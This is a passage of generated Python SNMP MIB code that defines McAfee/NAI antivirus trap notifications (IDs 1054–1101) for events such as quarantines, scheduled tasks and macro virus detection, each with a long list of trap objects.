mcafee_EVENT_DELETED_HEURISTICS = _mcafee_trap(1054)
mcafee_EVENT_DELETE_ERR_HEURISTICS = _mcafee_trap(1055)
mcafee_EVENT_QUARANTINED_HEURISTICS = _mcafee_trap(1056)
mcafee_EVENT_QUAR_ERROR_HEURISTICS = _mcafee_trap(1057)
# NOTE(review): trap id 1058 is absent in the generated data (1057 jumps to
# 1059) — presumably missing from the source MIB; preserved as-is.
mcafee_EVENT_SCAN_TIMEOUT = _mcafee_trap(1059)
mcafee_EVENT_BOOT_SECTOR_CLEANED = _mcafee_trap(1060)
mcafee_EVENT_CLEANERROR_BOOTSECTOR = _mcafee_trap(1061)
mcafee_EVENT_ALERTERROR = _mcafee_trap(1062)
mcafee_EVENT_OPTIONSERROR = _mcafee_trap(1063)
mcafee_EVENT_SERVICE_STARTED_1064 = _mcafee_trap(1064)
mcafee_EVENT_SERVICE_ENDING_1065 = _mcafee_trap(1065)
mcafee_EVENT_SCED_START_TASK_OK = _mcafee_trap(1066)
mcafee_EVENT_SCHED_START_TASK_ERROR = _mcafee_trap(1067)
mcafee_EVENT_SCED_TASK_END_OK = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1068)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCHED_TASK_STOP_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1069)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCHED_TASK_SUCCESS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1070)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCHED_TASK_CANCELED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1071)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_TASKERR_LOGFILE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1076)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_TASK_ERR_MEMALLOC = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1077)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_PROC_ERR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1086)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_OAS_START = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1087)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_OAS_STOP = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1088)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_SETTINGS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1089)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MACRO_VIRUS_DETECTED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1100)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MACRO_VIRUS_DELETED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1101)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
